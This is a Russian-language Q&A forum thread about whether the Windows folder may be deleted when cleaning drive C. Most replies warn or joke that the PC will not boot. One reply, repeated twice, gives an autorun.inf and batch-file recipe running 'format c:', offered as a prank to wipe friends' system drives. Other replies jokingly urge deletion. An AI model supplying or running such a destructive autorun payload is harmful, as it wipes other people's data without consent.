Прочее компьютерное
Люди,можно ли при очистке диска С удалять папку "Windows"?
Windows - папка с системой. Удалите - не запустится комп.. . если, конечно, у Вас не линкус, и ВЫ не чистите диск С от останков старой винды =)))
Это и есть система - пишу быстро, чтобы успеть...)))))
нет не можно
Если получится удалить папку "Windows", напиши, поделись опытом.
Конечно-можно! Никого не слушай и удаляй!!!!
зто все равно что когда чистишь уши удаляешь мозги
попробуйте вот будете удивлены при следующей загрузке всё опять будет на месте))
Выделив папку Windows и нажать пунк удалить, не паможет. Папка Windows защищена от удаления стандартным путём. Но я жестока прикалывался над друзьями заставив ОС отфарматировать Системный диск из Autorun.Если ты к этому клонила задавая вопрос. Для этого IO.sys skrytyi fail na diske s windoi. Prosto otkroi bloknot i pereiminui ego iz new.txt v IO.SYS i vse.
shellexecute=autorun.exe
Action= start.bat
Icon=,0
v batnike pishem
@echo off
format c:
eto dlia osobo zverskih pakostei- formatiruet C. хе хе хе!
Но а так служба защиты файлов операционной системы не даст тебе удалить папку "Windows".Так что можеш чистить ультилитами дальше, они на такое не спасобны если в них конечно не покавыряться хорошенько :)
shellexecute=autorun.exe
Action= start.bat
Icon=,0
v batnike pishem
@echo off
format c:
когда винду переустанавливаешь можно, а так нет,...
можно.. . но потом будет весело...
он не удалится
нет, плакать будешь.)))
Толлько снимите ограничения в правах.
Удалять можно все ;) Если не спрашивать о последствиях
Елена Добрынина, смотря что удалять...
не стоит удалять, потом хлопот не оберешся